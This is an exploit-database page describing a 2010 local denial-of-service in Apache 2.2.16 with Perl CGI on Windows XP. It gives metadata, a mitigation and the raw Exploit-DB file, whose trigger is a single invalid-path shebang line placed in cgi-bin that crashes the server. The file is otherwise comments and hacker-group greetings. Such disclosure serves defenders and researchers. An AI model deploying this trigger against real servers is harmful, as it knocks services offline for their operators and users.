header-logo
Suggest Exploit
vendor:
Apache
by:
FB1H2S
7,5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Apache
Affected Version From: 2.2.16
Affected Version To: 2.2.16
Patch Exists: No
Related CWE: N/A
CPE: 2.2.16
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP
2010

Apache 2.2 local denail of service windows

A local denial of service vulnerability exists in Apache 2.2.16 on Windows XP. This bug is only affected on (Apache + perl) windows. To exploit this vulnerability, an attacker must save a malicious .pl file in the Apache cgi-bin directory and call it from a browser. This will cause Apache to crash and throw a debug prompt if configured.

Mitigation:

Disable the Perl CGI module in Apache, or upgrade to a version of Apache that is not affected by this vulnerability.
Source

Exploit-DB raw data:

#!c:\\perl\\bin\\
#
##
# Exploit Title: Apache 2.2 local denail of service windows
# Date: 25/10/2010
# Author: FB1H2S
# Software Link: http://httpd.apache.org/.
# Version: APACHE 2.2.16
# Tested on: wINDOWS xP SERVICE PACK 3
# CVE :
##
##Save the file as .pl in apache cgi-bin and Call this file from your browser and appache will
##crash throwing a debug prompt if configured
## Apache by default is configured with perl and Crash occurs when a perl cgi module tries to
##execute, calling the perl cgi binary from the "c:\\ path" which is an invalid location. Apache ##by default restarts automatically on every crash. Tested on Apache 2.2.16 on windows xp. This ##bug

##is only affected on (Apache + perl) windows.
##
############################################################################################
#And all greets to Garage Hackers Members.
#http://www.garage4hackers.com/forum.php  an Information Security portal
#And shouts to ICW, Andhra Hackers members
#B0Nd,Eberly,Wipu,beenu,w4ri0r,empty,neo,Rohith,Sids786,SmartKD,Tia,h@xor,r5scal,Atul,Vinnu
#############################################################################################
##
##
##
##
##
##

Navigation

Suggest Exploit

Services By CQR